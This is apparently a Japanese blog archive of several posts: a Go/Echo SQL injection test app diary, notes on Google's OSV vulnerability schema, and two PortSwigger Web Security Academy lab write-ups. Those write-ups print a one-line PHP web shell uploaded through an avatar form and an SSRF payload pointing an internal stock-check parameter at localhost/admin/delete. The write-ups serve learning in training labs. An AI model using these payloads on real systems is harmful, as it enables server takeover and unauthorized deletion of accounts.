SQLインジェクションの検証環境が欲しくて、ついでにGo言語とGoのWebアプリケーションフレームワークEchoも触っておくかということで↓を作りました。ぜんぜん大したものじゃないんですが、日記として。

github.com

今はシンプルにJSONを返すだけですが、Reactでも学んでフロントもちゃんと作ろうかなと思います。Echoの機能も初歩の初歩しかやってないので、がんばります。

Echoを使うにあたっては、ISUCON12予選のコードを参考にしました。

github.com

以下、Go言語ではじめて何か作ったメモとか感想：

• Go言語のパッケージやモジュールの概念について
  • とりあえず最初に go mod init github.com/shinobe179/repo_name する
  • 以降は、パッケージが必要になったら go get すれば勝手に足されていく
  • 今開発しているものをimportする場合、基本的にはGitHubにアップロードしてgo getしなければならないの？
    • そんなわけないよな
  • go mod tidyって使わなかったけどいいんだろうか
  • パッケージってどういう風に分けるのがいいんだろう？
  • ディレクトリってどういう風に分けるのがいいんだろう？

あとずっとPythonしか書いてこなかったので、型との付き合い方みたいなものに慣れていないと感じました。やることはあんまり変わらない（使いたい関数の引数と戻り値、そしてそれぞれの型を確認して使う）はずなんですが。

はじめに

Googleがosv-scannerというリポジトリを公開しています。どうやら脆弱性スキャナのようです。

github.com

これを使ってみる前に、OSVとかSBOMとか、知らなかった概念について先に掘り下げて置こうと思います。この記事ではOSVについて見ていきます。

OSV

トップページ曰く「A distributed vulnerability database for Open Source」とのこと。

osv.dev

Aboutでは、OSVは以下のものから構成されると説明しています。

• OSV Schemaという脆弱性を記述するためのデータフォーマット
• OSV Schemaで記述された脆弱性情報を集約、参照するためのインフラストラクチャー
  • サイトそのもの
  • API
  • ツール（osv-scannerもここに含まれる？）

OSV Schema

OSV Schemaがどんな感じか見てみることにします。

ossf.github.io

Aboutによると、OSV Schema策定にあたっての課題意識のひとつとして、各エコシステムでのパッケージの命名およびバージョニングとCPEを照合するのって難しいよね、というのがあるようです。

Enforces version specification that precisely matches naming and versioning schemes used in actual open source package ecosystems. For instance, matching a vulnerability such as a CVE to a package name and set of versions in a package manager is difficult to do in an automated way using existing mechanisms such as CPEs.

CPEという仕組み自体が結構きついよね、という話を以前フォロワーさんとした記憶があって、掘り返してみたらやっぱり嘆いてました。もっとも、今見返すと無意識的にプロプライエタリな製品について言及していたと思うので、このOSVのスコープ外ですかね。なんてったって「Open Source Vulnerabilities」だし。

NISTのCPE Dictionaryを見ると、製品によって充足ぶりにばらつきがあるのはなんで……？やる気……？

— shinobe179 (@shinobe179) 2020年10月7日

OSV Schemaは、以下のような情報を含んでいます。

• 脆弱性情報の公開日や更新日
• 要約と詳細
• 影響を受けるパッケージ
• 参考URL
• 重大度

severity

重大度を示す severity[] は type というフィールドを持ち、これは執筆時点で CVSS_V2 もしくは CVSS_V3 の値をとることが想定されています。

ossf.github.io

そのうちEPSSとかも入ってくるんですかね？

www.first.org

また、このスキーマはありものの脆弱性情報の効率的な記述方法を提案するものであって、CVSSにとって代わるような新たな脆弱性評価手法を提案するものではないことが分かります。

affected

各パッケージへの影響範囲を示す affected[] は、以下の情報から構成されます。

• package
• ranges
• versions
• ecosystem_specific
• database_specific

package

脆弱性の影響を受けるパッケージに関する情報です。以下の値を持ちます。

• ecosystem: エコシステム名。 Go とか npm とか。
• name: パッケージ名。
• purl: purl-specという標準に則った、パッケージのURI。オプション。

purl-specというのは初耳でした。これもエコシステムによってパッケージの命名規則を統一することで参照しやすくしようというのがねらいのようです。

github.com

ranges

以下の値を持ちます。

• type: indtoduced および fixed で使うバージョンの表現方法。
  • SEMVER: SemVer 2.0.0 に則ったバージョン表記。
  • ECOSYSTEM: 各エコシステムに則ったバージョン表記。
  • GIT: Gitのコミットハッシュ。
• repo: パッケージのコードリポジトリのURL。affected[].ranges[].type が GIT の時は必須。
• events[]: 脆弱性の各イベント（発生、修正など）に関する情報。
  • introduced: 脆弱性が発生したバージョン。
  • fixed: 脆弱性が修正されたバージョン。
  • limit: 上限。ってなんだ……？？

versions

脆弱性があるパッケージバージョンのリストです。 affected[].ranges と役割が重複している感じがしますが、脆弱性があるバージョンを列挙してあるとぱっと見分かりやすいよねぐらいのフィールドなんだと勝手に解釈しています。

例えば、Log4Shellに該当するJSONファイルを見てみると、 affected.version がありません。

github.com

しかしosv.devで同じ脆弱性のページを見てみると、（JSONに affected.version はないのに）Affected versionsとして値がマッピングされていることが分かります。

osv.dev

後述する参考実装でも、rangesとversionsの両方を評価する実装になっているので、やはり意味合い的に重複するものみたいです。

affected[] による脆弱性評価

OSVで記述された脆弱性情報を用いて脆弱性評価をするコードの参考実装が紹介されていました。メインルーチンである IsVulnerable() だけ読んでみると、以下のようなロジックになっています。

• 検査対象であるパッケージが affected.package と同一だったら次のチェックをする
  • 検査対象バージョンが affected.versions に含まれているか、affected.ranges に含まれていたら脆弱性あり
• いずれにも該当しなければ脆弱性なし

func IsVulnerable(pkg, v, osv)
  for affected in osv.affected
    if affected.package == pkg
      if IncludedInVersions(v, affected.versions) ||
           IncludedInRanges(v, affected.ranges)
        return true

  return false

疑問点

参考実装では pkg と osv.affected[].package を直接比較していますが、 これを成立させるために pkg をOSV形式に直すのって実は地道な努力が必要だったりしないか？と思うなどしました。それこそosv-scannerのソースを読めば解決しそうですが、それはまた次のお話ということで。

はじめに

Web Security Academyの「Remote code execution via web shell upload」解いてみました。

portswigger.net

難易度的に簡単なものが続いているのはご容赦ください。。 あと、ウェブシェルって色々あると思うんですが、使いやすいもの、多機能なもの、見た目がいい（かわいい）ものなど、おすすめがあったら教えてください。

Writeup

前提情報

• ファイルアップロード機能に脆弱性あり（アップロードしたファイルを検証しない）

Walkthrough

以下のような簡単なウェブシェルを用意しておく。

<?php echo system($_GET["cmd"]) ?>

マイページのアップロード機能で、ウェブシェルをアップロードする。 本来アバターの画像をアップロードするための機能なので、アバター画像を別タブで開くとウェブシェルが開く。

あとは cat /carlos/secret すればいい……はずが、なぜか同名ファイルが存在しているみたいで、同じ内容が二度表示される点に注意。

はじめに

PortSwigger Web Security Academyの「Basic SSRF against the local server」を解きました。

portswigger.net

Writeup

事前情報

• 在庫確認機能は、内部システムにデータをフェッチする

Walkthrough

商品ページを見て、 在庫チェック機能のリクエストをプロキシして見てみると、POSTパラメータとしてフェッチ先のURLを指定している。

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

リクエストをRepeaterに送って、http://localhost/admin にしてみると、管理画面のHTMLが閲覧できる。

<section>
    <h1>Users</h1>
    <div>
        <span>carlos - </span>
        <a href="/admin/delete?username=carlos">Delete</a>
    </div>
    <div>
        <span>wiener - </span>
        <a href="/admin/delete?username=wiener">Delete</a>
    </div>
</section>

http://loaclhost/admin/delete?username=carlos にリクエストを送ったらcarlosを消せる。

stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos

Inspector（Repeater画面の右側に出てくるペイン）を使うと、エンコードなどを自動でやってくれるので便利。Decodedfromのほうを編集する。